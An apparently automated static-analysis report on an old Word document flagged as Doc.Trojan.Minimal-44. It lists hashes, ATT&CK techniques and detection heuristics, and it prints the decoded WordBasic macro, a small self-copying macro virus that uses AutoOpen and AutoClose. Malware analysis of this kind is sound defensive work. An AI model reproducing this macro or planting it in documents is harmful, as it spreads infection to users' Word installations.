Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 46bd6e7aa90ae093…

MALICIOUS

Office (OLE)

41.5 KB Created: 1998-07-19 15:45:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 23ed5e752147a1e1f8bf238455370ae6 SHA-1: 3f38387072fb603b994fc485748b873758ca3810 SHA-256: 46bd6e7aa90ae093c895a32bb86c39f4aa33a144d7ed01fad206fc168d5f8823
280 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The file is a legacy Microsoft Word document containing a WordBasic macro. The AutoOpen macro attempts to save the document and copy itself to new macro names ('AutoOpen' and 'AutoClose'), suggesting an attempt to establish persistence or complicate analysis. The presence of legacy macros and the ClamAV detection indicate malicious intent.

Heuristics 6

  • ClamAV: Doc.Trojan.Minimal-44 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Minimal-44
  • OLE document has large unaccounted-for region high OLE_SLACK_ANOMALY
    OLE file is 42,496 bytes but its declared streams total only 20,632 bytes — 21,864 bytes (51%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Auto_Close macro high OLE_VBA_AUTOCLOSE
    Auto_Close macro
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 912 bytes
SHA-256: 3e4575382a11628ca0c6db199ad05fa9a27366819310d00c4c3ef469d7969ffd
Detection
ClamAV: Doc.Trojan.Minimal-44
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "AutoOpen"

Public Sub MAIN()
Attribute MAIN.VB_Description = "Smallest MV From NoMercy (99 bytes!) \r\nNJ, Your Q-E not work properly\r\nPyro, Hello... are you there?\r\nGreetz To:\r\n-Cicatrix-NJ-Vecna-VD-AndryC-VictorW-AuroDreph-DarkSide1-DarkChakal-StealthW-NoMercyMembers-StalkerX-Alex:Tw-Queen-Methyl-Pyro-ClanMaster-"
Attribute MAIN.VB_ProcData.VB_Invoke_Func = "TemplateProject.AutoOpen.MAIN"
Dim A$
Dim C$
A$ = WordBasic.[FileName$]() + ":AutoOpen"
C$ = "AutoClose"
On Error Resume Next
WordBasic.FileSaveAs Format:=1: WordBasic.MacroCopy C$, A$
WordBasic.MacroCopy A$, C$
WordBasic.FileSave
End Sub